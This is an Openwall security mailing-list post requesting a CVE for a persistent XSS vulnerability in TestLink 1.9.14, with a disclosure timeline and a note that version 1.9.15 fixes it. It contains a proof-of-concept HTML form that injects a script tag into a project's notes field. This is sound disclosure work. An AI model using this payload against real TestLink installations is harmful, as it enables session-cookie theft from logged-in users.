Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 8 Nov 2015 20:25:46 +0530
From: Aravind <>
Subject: CVE Request: TestLink 1.9.14 Persistent XSS Vulnerability

Can I have a CVE assigned to the following ?

Name: Persistent XSS Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage:
Severity: High
Status: Fixed

Vulnerability Type:
Persistent XSS

CVE Reference:
Not assigned

Technical Details:
Persistent XSS entry point exist in TestLink 1.9.14 allowing arbitrary
client side browser
code execution on victims who visit persistently stored XSS payloads.
The vulnerability has been
discovered in the POST request to create a new Test Project. By
exploiting the vulnerability,
the attacker will get access to the logged in users session cookie. No
Filtering exist on the
vulnerable parameter.

Vulnerable Parameter:

Exploit Code

<html lang="en">
<title>Exploit Persistent XSS TestLink 1.9.14</title>
<form action="http://localhost/testlink_1_9_14/lib/project/projectEdit.php"
id="formid" method="post">
<input type="hidden" name="CSRFName" value="" />
<input type="hidden" name="CSRFToken" value="" />
<input type="hidden" name="copy_from_tproject_id" value="0" />
<input type="hidden" name="tprojectName" value="c1" />
<input type="hidden" name="tcasePrefix" value="c2" />
<input type="hidden" name="notes" value="<script>alert(222)</script>" />
<input type="hidden" name="optPriority" value="on" />
<input type="hidden" name="optAutomation" value="on" />
<input type="hidden" name="active" value="on" />
<input type="hidden" name="is_public" value="on" />
<input type="hidden" name="doAction" value="doCreate" />
<input type="hidden" name="tprojectID" value="0" />
<input type="hidden" name="doActionButton" value="Create" />

Exploitation Technique:

Severity Level:

Advisory Timeline
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure

This vulnerability is fixed in TestLink 1.9.15 (Tauriel)

Credits & Authors
Aravind C Ajayan, Boney S Kalarickal

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.